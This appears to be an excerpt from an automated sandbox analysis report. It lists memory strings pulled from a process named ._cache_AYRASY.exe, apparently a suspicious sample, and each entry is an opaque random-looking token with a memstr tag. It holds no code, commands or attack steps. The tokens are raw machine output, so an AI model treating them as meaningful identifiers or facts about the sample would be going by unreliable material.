Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u8yy7rs5rc1cememstr_33ff97d2-8
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e3gw0mn6cg4i3lu1wa5z6t\memstr_c73471ed-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d8yw6wo4nn6twmemstr_a90633b1-7
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b8pb2bx2j1c.memstr_6ffdc43e-c
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e3gw0mn6cg4i3lu1wa5z5k)memstr_a5d089ea-4
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u8yy7rs5rc1c memstr_5e0c15ed-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u1ql7cn9w;memstr_92eeb600-5
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b8pb2bx2j2memstr_d5035574-4
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u8qw3xh1fmemstr_8e0f1c7e-f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0xt2ey8sh8u4ps5li7qu5mmemstr_5a4919a7-3
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0xt2ey8sh8u6xs5ti6zmemstr_aa9ba1df-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v9sn9ql6ij9hyu2yu7gr8mmemstr_c253fc15-0
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d6du1gd4smemstr_06f34736-3
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405034j188405034memstr_64e12131-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d7de0rp8xmemstr_8b95b297-1
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u4gn4jh0pmemstr_dcd6e600-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b8uv3ry1i6zmemstr_2ac00dff-f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v9sn9ql6ij9hqr6ch4fmemstr_64ed0582-a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v9sn9ql6ij9hyu2yu7gr8mjmemstr_994b45fb-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b8uv3ry1i4sememstr_209ede5b-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u8qw3xh1f|memstr_ecfb5b5a-2
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405034j188405035wmemstr_02cb4cf9-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405077j188405108nmemstr_6ac1c044-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0xt2ey8sh8u9ff9as0bimemstr_01283ce8-1
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b8uv3ry1i@memstr_9a984167-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405077j188405108[memstr_b8003d77-2
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d6du1gd4srmemstr_9b97b15d-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u1ql7cn9w8xm-memstr_2cf2341c-9
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405094j188405047?memstr_d0214b38-3
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b9yg3jv6rv9l6memstr_f48aa222-8
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f1xo2za0wc8o1memstr_16b10a06-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405035j188405091v9lmemstr_b53d3156-a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405095j188405083memstr_f463f09f-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b9yg3jv6rv9lmemstr_402898d9-7
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f9vk4bx1qk1nmemstr_ae8f4748-1
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u5uk0yu1o6rv9lmemstr_15b95336-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u5uk0yu1omemstr_19d7ae6d-2
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b4qe2ec4smemstr_4dd54b9a-2
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b8be0eb6ed5wmemstr_0d435c1d-0
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405035j188405091memstr_84d1b5e2-c
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405095j1884050485wmemstr_e7ecd30d-1
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b8be0eb6ed5wnmemstr_6b198eff-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405095j188405048imemstr_3a11afce-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s9cw2an8pus7og6rs7nj5y`memstr_cb638f4f-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b2kv4rk7iu5k{memstr_e4e603a5-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d7de0rp8xrmemstr_770176b0-5
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405035j188405091mmemstr_553b43f0-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f1xo2za0wc8odmemstr_8179c8dd-f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b4qe2ec4s9l_memstr_2c8edfbe-5
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405035j188405091d5wvmemstr_77965edc-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b0bz5dg1cl1jqmemstr_15b4e56a-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b3pm7iq9wj5y(memstr_dc515d88-a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d3ui1ji9st7j#memstr_c6a19fc6-5
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b8pb2bx2j:memstr_ae57bcc1-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u5uk0yu1o5memstr_1e7a146a-5
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b3pm7iq9wj5ymemstr_38ce1b3a-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0xt2ey8sh8u8fg7cf9tq7wmemstr_cc5f3911-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s9cw2an8pus7og6rs7nmemstr_04a65cc2-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d3ui1ji9st7jmemstr_f7d499b1-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405094j188405047memstr_33cd4534-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b0ys9gf9jmemstr_77badf8b-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u5uk0yu1o9wj5ymemstr_91fc7a27-0
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u1ql7cn9wmemstr_b1350449-5
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f9vk4bx1qk1n9lmemstr_fb9cfc7f-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b9yg3jv6rv9lmmemstr_825ec8b1-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f1xo2za0wc8odmemstr_fb70260c-f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d3ui1ji9st7jvmemstr_52d19156-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b0bz5dg1cl1j7jqmemstr_55ddffba-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f6xm8dx6ss6h5khmemstr_9dbd7799-4
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b8be0eb6ed5wcmemstr_ddbe6f5d-7
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b0ys9gf9j7jzmemstr_5771f26a-3
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405035j188405091,memstr_c78f9d2e-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 188405035j188405091'memstr_52fa2c0a-4
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b0bz5dg1cl1j>memstr_2a6d28c7-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d3ui1ji9st7j9memstr_96e72947-f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b3pm7iq9wj5y0memstr_afe7401e-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f1xo2za0wc8omemstr_f2b6f57f-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u3vh1ra2fmemstr_35c43efc-f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f6xm8dx6ss6hhmemstr_8fd27a29-3
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u3vh1ra2fcmemstr_27e3b4fd-7
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u3vh1ra2f1vzmemstr_9a540491-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u1yc8yb9qc1vumemstr_76ac4095-2
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u1yc8yb9qc1vgmemstr_9638aba3-a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u1yc8yb9qc1v^memstr_4b0407b3-f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e3gw0mn6cg4i3lu1wa5zymemstr_4a9c3358-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e3gw0mn6cg4i3lu1wa5zpmemstr_827bae13-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u3vh1ra2f+memstr_8478844c-0
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f6xm8dx6ss6h"memstr_63046563-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u3vh1ra2f1v=memstr_0e523928-f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u1yc8yb9qc1v4memstr_b73afe27-d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u3vh1ra2f5zmemstr_be7ce4d8-5
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f6xm8dx6ss6hmemstr_f8b62253-2
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: k4ha7yg1wr6g6ll0mz2xd8wmemstr_e7e267b4-8
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d4vt8bo4dw2ememstr_be00b066-6
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f9bp7re7uz5jmemstr_3d39a41b-9
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b8xm3wv3ch8qmemstr_f632f466-1
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u4fa4dt2h2xd8wlmemstr_3b563a6b-8
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u4fa4dt2hgmemstr_fcce2dc6-1
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: k4ha7yg1wr6g6ll0mz2xd8wymemstr_9499442c-2
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u4fa4dt2h4dw2epmemstr_640cec16-c
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b8xm3wv3ch8qkmemstr_4263e281-a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u1ql7cn9w5jbmemstr_642bd541-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: k4ha7yg1wr6g6ll0mz2xd8w]memstr_4445ae30-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: k4ha7yg1wr6g6ll0mz2xd8wtmemstr_7c454cb3-4
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f9bp7re7uz5j8w/memstr_7697d3eb-a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g0dd2df3f9bp7re7uz5j!memstr_a9dfab06-a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: k4ha7yg1wr6g6ll0mz2xd8w8memstr_734509d5-a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u4fa4dt2h4dw2e3memstr_53fa22aa-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w2xd8wmemstr_dbda75e3-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1yc8yb9qc1vmemstr_35e1cf87-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u4fa4dt2hmemstr_d9b5dc57-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u5oh9vd4lg4xmemstr_e9d1526b-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d0jj9wj2sx5xmemstr_a2b56927-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5t5xmemstr_515c6b1e-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u8yy7rs5rc1cmemstr_51e3e1f8-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4vkmemstr_4342b25e-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u3ln6ei5n}memstr_f54a21e3-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u4fa4dt2homemstr_9a001174-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u3ln6ei5nfmemstr_c91ce69f-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u3ln6ei5namemstr_4c89b0cc-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5oa0il8dv6xxmemstr_11c0100d-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i7tr7nj9bsmemstr_6eec7023-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4v*memstr_24439022-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4v%memstr_f1e2e45c-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405034j1884050374v<memstr_c7e3ac08-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5tr7memstr_e448ee8c-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4vmemstr_4801fed1-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w5tmemstr_e9cf7efb-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5t4vmemstr_08f1b707-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5tmemstr_f4e51c96-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i8bx1zm7wmemstr_e1ec11f9-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w7iu5kmemstr_c9335370-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w3sk4vmemstr_eb14d0c1-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f0cv4vm9nd2womemstr_c7cbc3a2-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f0cv4vm9nd2wfmemstr_c38ed4d1-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5tamemstr_e192cec7-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8pb2bx2j7wxmemstr_638ef503-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8pb2bx2jsmemstr_00f47b43-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4vjmemstr_5d4ae707-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5t\memstr_92d13ca5-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5twmemstr_fb2cc036-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b1xs9wu1ym2g.memstr_0794b33d-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i8bx1zm7w)memstr_2d649516-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5t memstr_771cf534-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5t;memstr_99b0bc18-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b2kv4rk7iu5k2memstr_b9d91691-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b1xs9wu1ym2gmemstr_6484d4a0-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3on4iq4p7ememstr_fe23dced-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5xl9kj0ba0dmemstr_1e6934c6-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p4ap0ca0sr7ememstr_3434016e-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c9ug7dm1nmemstr_cd9d6943-5
